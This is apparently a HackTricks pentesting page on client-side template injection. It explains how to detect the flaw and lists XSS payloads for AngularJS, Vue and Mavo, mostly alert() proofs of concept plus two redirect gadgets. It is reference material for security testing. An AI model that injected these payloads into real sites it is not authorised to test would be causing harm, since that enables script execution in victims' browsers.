hacktricks/pentesting-web/client-side-template-injection-csti.md
2021-11-30 13:55:54 +00:00

4.4 KiB

Client Side Template Injection (CSTI)

Summary

It is like a Server Side Template Injection but in the client. The SSTI can allow you the execute code on the remote server, the **CSTI **could allow you to execute arbitrary JavaScript code in the victim.

The way to **test **for this vulnerability is very **similar **as in the case of SSTI, the interpreter is going to expect something to execute between doubles keys and will execute it. For example using something like: {{ 7-7 }} if the server is **vulnerable **you will see a 0 and if not you will see the original: {{ 7-7 }}

AngularJS

AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the ng-app attribute (also known as an AngularJS directive). When a directive is added to the HTML code, you can execute JavaScript expressions within double curly braces.
For example, if your **input **is being **reflected **inside the **body **of the HTML and the body is defined with ng-app: <body ng-app>

You can execute arbitrary JavaScript code using curly braces **adding **to the body:

{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>

You can find a very basic online example of the vulnerability in AngularJS in http://jsfiddle.net/2zs2yv7o/

{% hint style="danger" %} ****Angular 1.6 removed the sandbox so from this version a payload like {{constructor.constructor('alert(1)')()}} or <input ng-focus=$event.view.alert('XSS')> should work. {% endhint %}

VueJS

You can find a vulnerable vue.js implementation in https://vue-client-side-template-injection-example.azu.now.sh/
Working payload: https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%

And the source code of the vulnerable example here: https://github.com/azu/vue-client-side-template-injection-example

<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>

A really good post in CSTI in VUE can be found in https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets

V3

{{_openBlock.constructor('alert(1)')()}}

Credit: Gareth Heyes, Lewis Ardern & PwnFunction

V2

{{constructor.constructor('alert(1)')()}}

Credit: Mario Heiderich

Check more VUE payloads in https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected

Mavo

Payload:

[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]

More payloads in https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations

Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}